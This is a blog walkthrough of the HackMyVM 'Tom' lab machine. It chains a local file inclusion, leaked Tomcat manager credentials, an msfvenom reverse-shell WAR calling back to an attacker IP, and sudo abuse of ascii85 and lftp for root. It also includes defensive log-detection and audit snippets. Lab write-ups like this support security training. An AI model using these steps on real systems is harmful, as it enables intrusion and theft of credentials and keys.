Windy's little blog

All the odds and ends of everyday life, and I like CTF.

HackMyVm Tom Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Tom

Key points: Tomcat configuration files and WAR upload through the manager.

Scan ports.

 ~ nmap -sV -sC -p-  -Pn 192.168.56.100  -oN ports.log                                       
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-16 09:56 CST
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00073s latency).
 Not shown: 65532 closed ports
 PORT     STATE SERVICE VERSION
 22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 55:5f:3f:15:c7:cb:5f:09:d6:a1:f5:70:06:d0:dd:bc (RSA)
 |   256 ec:db:41:19:b8:60:bc:53:6f:c7:ef:c6:d3:ee:b9:b8 (ECDSA)
 |_  256 2e:0d:03:27:a5:2a:0b:4e:b0:6a:42:01:57:fd:a9:9f (ED25519)
 80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 8080/tcp open  http    Apache Tomcat 9.0.54
 |_http-favicon: Apache Tomcat
 |_http-title: Apache Tomcat/9.0.54
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel        


Enumerate port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log 
 ===============================================================
 /index.html           (Status: 200) [Size: 10701]
 /javascript           (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
 /tomcat.php           (Status: 200) [Size: 0]              


Fuzz tomcat.php for a parameter name, using /etc/passwd as the value and hiding empty (0-character) responses.

 ~ wfuzz -u 'http://192.168.56.100/tomcat.php?FUZZ=/etc/passwd'    -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000007570:   200        27 L     39 W       1441 Ch     "filez"          


Read /etc/passwd through the filez parameter.

 ~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/passwd'       
 root:x:0:0:root:/root:/bin/bash
 ...
 nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
 ...
 tomcat:x:1001:1001::/opt/tomcat:/bin/false
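From the server side, the filez probes above are easy to pick out of the Apache access log. The following check is an added example (not part of the original walkthrough and not a tool the author used): it parses constructed combined-format log lines modelled on these requests and flags query-parameter values that are absolute paths or contain traversal. Log lines, timestamps and user agents are constructed; the function names are mine.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-format lines modelled on this walkthrough's requests; the
# 1441-byte /etc/passwd response matches the size wfuzz reported. Not real server logs.
SAMPLE_LOG = """\
192.168.56.150 - - [16/Oct/2021:10:20:01 +0800] "GET /tomcat.php?filez=/etc/passwd HTTP/1.1" 200 1441 "-" "curl/7.79.1"
192.168.56.150 - - [16/Oct/2021:10:29:59 +0800] "GET /tomcat.php?filez=/etc/systemd/system/tomcat.service HTTP/1.1" 200 612 "-" "curl/7.79.1"
192.168.56.150 - - [16/Oct/2021:10:31:12 +0800] "GET /tomcat.php?filez=/opt/tomcat/latest/conf/tomcat-users.xml HTTP/1.1" 200 2103 "-" "curl/7.79.1"
192.168.56.150 - - [16/Oct/2021:10:31:40 +0800] "GET /tomcat.php?filez=..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 0 "-" "Wfuzz/3.1.0"
192.168.56.10 - - [16/Oct/2021:10:32:05 +0800] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
192.168.56.10 - - [16/Oct/2021:10:32:06 +0800] "GET /tomcat.php?filez=about HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\S+)')
# An absolute path or a ../ step in a parameter value is the signal (parse_qs has already
# percent-decoded the value once, so ..%2F shows up here as ../).
SUSPICIOUS_VALUE = re.compile(r'^/|\.\./|\.\.\\')
SENSITIVE = ("/etc/passwd", "/etc/shadow", "tomcat-users.xml", ".ssh/", "/proc/self/")

def find_lfi_attempts(log_text):
    """One dict per request whose query-parameter value looks like a filesystem path."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m["target"])
        for param, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:
                if SUSPICIOUS_VALUE.search(value):
                    hits.append({
                        "ip": m["ip"], "ts": m["ts"], "path": url.path, "param": param,
                        "value": value, "status": int(m["status"]),
                        "size": int(m["size"]) if m["size"].isdigit() else 0,
                        "sensitive": any(s in value for s in SENSITIVE),
                    })
    return hits

def successful_reads(hits):
    """Probes answered with 200 and a non-empty body: the file was most likely served."""
    return [h for h in hits if h["status"] == 200 and h["size"] > 0]
```

A 200 with an empty body (the wfuzz baseline that --hh 0 hid) is a probe that missed; a 200 with content for a sensitive path is the one to alert on.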


We need Tomcat's home directory, so read its systemd unit.

 ~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/systemd/system/tomcat.service'
 [Unit]
 Description=Tomcat 9 servlet container
 After=network.target
 
 [Service]
 Type=forking
 
 User=tomcat
 Group=tomcat
 
 Environment="JAVA_HOME=/usr/lib/jvm/default-java"
 Environment="JAVA_OPTS=-Djava.security.egd=file:///dev/urandom"
 
 Environment="CATALINA_BASE=/opt/tomcat/latest"
 Environment="CATALINA_HOME=/opt/tomcat/latest"
 Environment="CATALINA_PID=/opt/tomcat/latest/temp/tomcat.pid"
 Environment="CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC"
 
 ExecStart=/opt/tomcat/latest/bin/startup.sh
 ExecStop=/opt/tomcat/latest/bin/shutdown.sh
 
 [Install]
 WantedBy=multi-user.target


Check the credentials file under CATALINA_BASE, conf/tomcat-users.xml.

 ~ curl 'http://192.168.56.100/tomcat.php?filez=/opt/tomcat/latest/conf/tomcat-users.xml' 
 ...
 <role rolename="admin-gui"/>
 <role rolename="manager-script"/>
 <user username="sml" password="H4ckMyP4$$w0rD!!!" roles="admin-gui,manager-script"/>
 </tomcat-users>


Generate a reverse-shell WAR and deploy it through the manager text interface, which the manager-script role permits.

 ~ msfvenom  -p java/shell_reverse_tcp lhost=192.168.56.150 lport=1234 -f war -o rev.war       
 Payload size: 13323 bytes
 Final size of war file: 13323 bytes
 Saved as: rev.war
 
 ~ curl --upload-file rev.war  -u 'sml:H4ckMyP4$$w0rD!!!' 'http://192.168.56.100:8080/manager/text/deploy?path=/upload'
 OK - Desplegada aplicación en trayectoria de contexto [/upload]
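The deploy above works because sml holds manager-script, and the credentials sat in a file the LFI could reach. The audit below is an added example (not from the post and not Tomcat's own tooling) that reads a tomcat-users.xml and reports which accounts can push code through /manager/text/deploy or the HTML manager, and which can administer hosts. The XML is constructed in the shape of the file recovered above, with placeholder passwords; the function names are mine.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml in the shape of the file recovered above; the passwords
# are placeholders, not the real ones.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <role rolename="probeuser"/>
  <user username="sml" password="PLACEHOLDER-1" roles="admin-gui,manager-script"/>
  <user username="monitor" password="PLACEHOLDER-2" roles="probeuser"/>
</tomcat-users>
"""

# manager-gui / manager-script can deploy a WAR, i.e. run code as the tomcat user;
# admin-gui / admin-script administer virtual hosts through host-manager.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
ADMIN_ROLES = {"admin-gui", "admin-script"}
NS = "{http://tomcat.apache.org/xml}"

def parse_users(xml_text):
    """Map username -> set of roles. Tomcat accepts both the namespaced form and bare
    <user> elements, and either 'username' or 'name' as the attribute."""
    root = ET.fromstring(xml_text)
    users = {}
    for el in list(root.iter(NS + "user")) + list(root.iter("user")):
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        users[el.get("username") or el.get("name")] = roles
    return users

def audit_tomcat_users(xml_text):
    """Return (username, finding) pairs for accounts that can push code or administer hosts."""
    findings = []
    for name, roles in parse_users(xml_text).items():
        if "manager-script" in roles:
            findings.append((name, "can deploy WARs via the text interface (/manager/text/deploy)"))
        elif roles & DEPLOY_ROLES:
            findings.append((name, "can deploy WARs through the manager HTML interface"))
        if roles & ADMIN_ROLES:
            findings.append((name, "host-manager admin: " + ", ".join(sorted(roles & ADMIN_ROLES))))
    return findings
```

Any account this reports should be scoped to the manager's own access controls and its password kept out of files a web process can read.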


Request the deployed WAR to trigger it and catch the reverse shell.

 ~ curl 'http://192.168.56.100:8080/upload/rev.war'
 
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:52234.
 id    
 uid=1001(tomcat) gid=1001(tomcat) grupos=1001(tomcat)


Check sudo -l.

 tomcat@tom:/var/www/html$ sudo -l
 sudo -l
 Matching Defaults entries for tomcat on tom:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User tomcat may run the following commands on tom:
     (nathan) NOPASSWD: /usr/bin/ascii85


Read nathan's id_rsa by running ascii85 as nathan through sudo.

 sudo -u nathan /usr/bin/ascii85 /home/nathan/.ssh/id_rsa -w 0
 <~/M/P+/ODlr8PUC+;aDO&;FsnT<(.p&79M2o/M/O]:i^Ja/Q@"7ANCqj/4E<$;HZgq777JN78#4(DJ!fJ+@JXs/O`&r1G(s\6S()K2Dm...


Decode the Ascii85 online to get id_rsa.

 -----BEGIN RSA PRIVATE KEY-----
 Proc-Type: 4,ENCRYPTED
 DEK-Info: DES-EDE3-CBC,5065755920B77C45
 
 pbcIb9gxpAhVFNik1U4P7SK+WnXji8QFUh11KM0oL8TXesjh+eRNlkHuYBvmm7rI
 ...
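The blob can be decoded locally rather than pasted into a web page, which matters when the payload is a private key. This is an added example, not the author's step: the leading `<~` on the ascii85 output is Adobe framing, which Python's base64.a85decode handles with adobe=True, and the result is written as a 0600 file so ssh will accept it. The sample key is a constructed placeholder and the function names are mine.

```python
import base64
import os
import stat

def decode_ascii85(text):
    """Decode ascii85(1) output: Adobe-framed (<~ ... ~>) and possibly line-wrapped
    when -w 0 was not used. Whitespace is dropped before decoding."""
    text = "".join(text.split())
    if text.startswith("<~"):
        if not text.endswith("~>"):
            raise ValueError("truncated Adobe Ascii85 blob: missing '~>' trailer")
        return base64.a85decode(text, adobe=True)
    return base64.a85decode(text)

def looks_like_pem_private_key(data):
    """Cheap sanity check that the decode produced key material, not garbage."""
    return data.startswith(b"-----BEGIN ") and b" PRIVATE KEY-----" in data

def write_private_key(path, data):
    """Create the file with mode 0600 from the start; ssh rejects keys readable by others."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, stat.S_IRUSR | stat.S_IWUSR)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)   # in case the file already existed
    return stat.S_IMODE(os.stat(path).st_mode)

# Constructed placeholder key (not the real one), encoded the way ascii85(1) frames it and
# wrapped at 64 columns to exercise the whitespace handling.
SAMPLE_KEY = (b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
              b"DEK-Info: DES-EDE3-CBC,0000000000000000\n\nPLACEHOLDERBASE64\n"
              b"-----END RSA PRIVATE KEY-----\n")
SAMPLE_BLOB = base64.a85encode(SAMPLE_KEY, adobe=True, wrapcol=64).decode()

if __name__ == "__main__":
    key = decode_ascii85(SAMPLE_BLOB)
    assert looks_like_pem_private_key(key)
    print(oct(write_private_key("id_rsa.example", key)))
```

The first group of the blob above, `<~/M/P+`, decodes to the four dashes that open a PEM header, which is a quick way to confirm the framing before decoding the whole thing.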


Crack the passphrase of the encrypted id_rsa.

 ~ /usr/share/john/ssh2john.py id_rsa  > hash
 ~ john --wordlist=/usr/share/wordlists/rockyou.txt hash
 Using default input encoding: UTF-8
 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
 Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
 Cost 2 (iteration count) is 2 for all loaded hashes
 Will run 2 OpenMP threads
 Note: This format may emit false positives, so it will keep trying even after
 finding a possible candidate.
 Press 'q' or Ctrl-C to abort, almost any other key for status
 darkness         (id_rsa)
 1g 0:00:00:29 81.06% (ETA: 11:09:00) 0.03336g/s 387097p/s 387097c/s 387097C/s 9405es..9405872
 Session aborted


Log in over SSH as nathan and check sudo -l.

 ~ ssh nathan@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':
 Linux tom 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
 /usr/bin/xauth:  file /home/nathan/.Xauthority does not exist
 nathan@tom:~$ sudo -l
 Matching Defaults entries for nathan on tom:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User nathan may run the following commands on tom:
     (root) NOPASSWD: /usr/bin/lftp


Get root: lftp runs shell commands when prefixed with !, so sudo lftp gives a root shell.

 nathan@tom:~$ sudo lftp
 lftp :~> !id
 uid=0(root) gid=0(root) grupos=0(root)
 lftp :~> !bash
 root@tom:/home/nathan# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 tom
 root@tom:/home/nathan#


